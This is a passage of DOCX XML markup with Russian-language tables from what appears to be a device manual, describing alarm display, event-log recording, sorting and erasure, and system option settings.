          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="955"/>
        <w:gridCol w:w="4584"/>
        <w:gridCol w:w="2693"/>
        <w:gridCol w:w="1559"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="955" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Индикация - установка вида тревоги</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4584" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Экран</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Индицируется полноэкранная надпись «</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>ALARM</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Выбрано/Не выбрано</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559"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blPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="955" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4584"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r w:rsidRPr="00DD0245">
              <w:t>Удержание тревоги</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Индикация тревоги остается до нажатия на любую клавишу</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693"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r w:rsidRPr="00DD0245">
              <w:t>Выбрано/Не выбрано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5DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Не выбрано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="552"/>
        <w:gridCol w:w="523"/>
        <w:gridCol w:w="1487"/>
        <w:gridCol w:w="4061"/>
        <w:gridCol w:w="1357"/>
        <w:gridCol w:w="1276"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9256" w:type="dxa"/>
            <w:gridSpan w:val="6"/>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Протокол</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1075"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Просмотр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5548" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Вход в просмотр протокола</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2633" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1075" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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t>Запись</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5548" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Разрешение/ запрещение записи в ПРОТОКОЛ СОБЫТИИ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2633" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Не выбрано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="552" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Сортировать</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Сортировать записи в протоколе по одному из признаков</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418"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По времени — фактически без сортировки, так как события поступают с течением времени</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276"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blPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="552" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418"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По уровню — сортировка по максимальному уровню в порядке убывания</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276"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Не выбрано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="552" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418"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По диапазону — сортировка по частотному диапазону</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276"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Не выбрано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="552" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418"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По длительности — сортировка по длительности события в порядке убывания.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276"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Не выбрано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="552" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8704" w:type="dxa"/>
            <w:gridSpan w:val="5"/>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Стирание всей информации о событиях. При этом появится дополнительный запрос: Вы уверены?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="552" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8704" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>ENTER</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:t xml:space="preserve"> — да, ДРУГАЯ — отмена. Для подтверждения стирания необходимо нажать кнопку) |. После</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="552" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8704" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>операции появится сообщение «Протокол удален». Если стирание не выполнить, то при переполнении</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="552" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>£</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8704" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>памяти, отведенной для записи событий, происходит автоматическое стирание банка с наиболее</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="552" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7428" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>старой информацией.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:tbl>
      <w:tblPr>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="509"/>
        <w:gridCol w:w="4955"/>
        <w:gridCol w:w="2549"/>
        <w:gridCol w:w="1032"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9045" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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Система</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="509" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Опция</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Описание</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1032"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Установки</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>по</w:t>
            </w:r>
